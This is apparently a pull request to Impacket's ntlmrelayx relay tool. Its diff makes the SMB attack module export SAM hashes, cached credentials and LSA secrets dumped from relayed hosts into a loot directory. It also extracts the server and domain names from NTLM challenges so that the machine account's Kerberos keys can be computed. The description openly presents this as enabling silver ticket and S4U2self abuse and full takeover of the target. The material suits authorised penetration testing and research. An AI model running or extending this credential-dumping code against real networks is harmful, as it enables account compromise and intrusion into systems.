### PR TITLE
Improved exporting and added Kerberos keys calculation

### DIFF
--- a/impacket/examples/ntlmrelayx/attacks/smbattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/smbattack.py
@@ -14,6 +14,8 @@
 #   Alberto Solino (@agsolino)
 #   Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
 #
+import os
+
 from impacket import LOG
 from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
 from impacket.examples.ntlmrelayx.utils.tcpshell import TcpShell
@@ -96,25 +98,31 @@ class SMBAttack(ProtocolAttack):
                 return
 
             try:
+                remote_host = self.__SMBConnection.getRemoteHost()
                 if self.config.command is not None:
                     remoteOps._RemoteOperations__executeRemote(self.config.command)
-                    LOG.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
+                    LOG.info("Executed specified command on host: %s", remote_host)
                     self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
                     self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
                     print(self.__answerTMP.decode(self.config.encoding, 'replace'))
                 else:
+                    if not os.path.exists(self.config.lootdir):
+                        os.makedirs(self.config.lootdir)
+                    outfile = os.path.join(self.config.lootdir, remote_host)
                     bootKey = remoteOps.getBootKey()
                     remoteOps._RemoteOperations__serviceDeleted = True
                     samFileName = remoteOps.saveSAM()
                     samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
                     samHashes.dump()
-                    samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes')
-                    LOG.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
-                    SECURITYFileName = remoteOps.saveSECURITY()     	
-                    LSASecrets = LSASecrets(SECURITYFileName, bootKey, remoteOps=None, isRemote= True, history=False)
+                    samHashes.export(outfile)
+                    LOG.info("Done dumping SAM hashes for host: %s", remote_host)
+                    SECURITYFileName = remoteOps.saveSECURITY()
+                    LSASecrets = LSASecrets(SECURITYFileName, bootKey, remoteOps=remoteOps, isRemote= True, history=False)
                     LSASecrets.dumpCachedHashes()
+                    LSASecrets.exportCached(outfile)
                     LSASecrets.dumpSecrets()
-                    LOG.info("Done dumping LSA secrets for host: %s", self.__SMBConnection.getRemoteHost())
+                    LSASecrets.exportSecrets(outfile)
+                    LOG.info("Done dumping LSA hashes for host: %s", remote_host)
             except Exception as e:
                 LOG.error(str(e))
             finally:

--- a/impacket/examples/ntlmrelayx/clients/smbrelayclient.py
+++ b/impacket/examples/ntlmrelayx/clients/smbrelayclient.py
@@ -326,6 +326,40 @@ class SMBRelayClient(ProtocolClient):
         else:
             challenge.fromString(self.sendNegotiatev2(negotiateMessage))
 
+        from impacket.ntlm import AV_PAIRS, NTLMSSP_AV_HOSTNAME, NTLMSSP_AV_DOMAINNAME, NTLMSSP_AV_DNS_DOMAINNAME, NTLMSSP_AV_DNS_HOSTNAME
+        if challenge['TargetInfoFields_len'] > 0:
+            av_pairs = AV_PAIRS(challenge['TargetInfoFields'][:challenge['TargetInfoFields_len']])
+            if av_pairs[NTLMSSP_AV_HOSTNAME] is not None:
+                try:
+                    self.sessionData['ServerName'] = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
+                except:
+                    # For some reason, we couldn't decode Unicode here.. silently discard the operation
+                    pass
+            if av_pairs[NTLMSSP_AV_DOMAINNAME] is not None:
+                try:
+                    if self.sessionData['ServerName'] != av_pairs[NTLMSSP_AV_DOMAINNAME][1].decode('utf-16le'):
+                        self.sessionData['ServerDomain'] = av_pairs[NTLMSSP_AV_DOMAINNAME][1].decode('utf-16le')
+                except:
+                    # For some reason, we couldn't decode Unicode here.. silently discard the operation
+                    pass
+            if av_pairs[NTLMSSP_AV_DNS_DOMAINNAME] is not None:
+                try:
+                    self.sessionData['ServerDNSDomainName'] = av_pairs[NTLMSSP_AV_DNS_DOMAINNAME][1].decode('utf-16le')
+                except:
+                    # For some reason, we couldn't decode Unicode here.. silently discard the operation
+                    pass
+
+            if av_pairs[NTLMSSP_AV_DNS_HOSTNAME] is not None:
+                try:
+                    self.sessionData['ServerDNSHostName'] = av_pairs[NTLMSSP_AV_DNS_HOSTNAME][1].decode('utf-16le')
+                except:
+                    # For some reason, we couldn't decode Unicode here.. silently discard the operation
+                    pass
+
+        self.session._SMBConnection._SMB__server_name = self.sessionData['ServerName']
+        self.session._SMBConnection._SMB__server_dns_domain_name = self.sessionData['ServerDNSDomainName']
+        self.session._SMBConnection._SMB__server_domain = self.sessionData['ServerDomain']
+
         self.negotiateMessage = negotiateMessage
         self.challengeMessage = challenge.getData()
 


### PR DESCRIPTION
- ntlmrelayx's smbattack.py now takes the `--lootdir` argument into account to export hashes into files
- ntlmrelayx's smbattack.py now exports the files with the same names used by secretsdump
- ntlmrelayx's smbrelayclient.py now extracts the server host, domain and dsndomainname during the `sendNegotiate()` operation. This allows to calculate the Kerberos salt used to calculate the Kerberos keys during the LSA dump.
Dumping the target's machine account's kerberos keys is essential as it allows silver ticket and s4u2self abuses and allows attackers to takeover the target without pass-the-hash, which can be limited sometimes.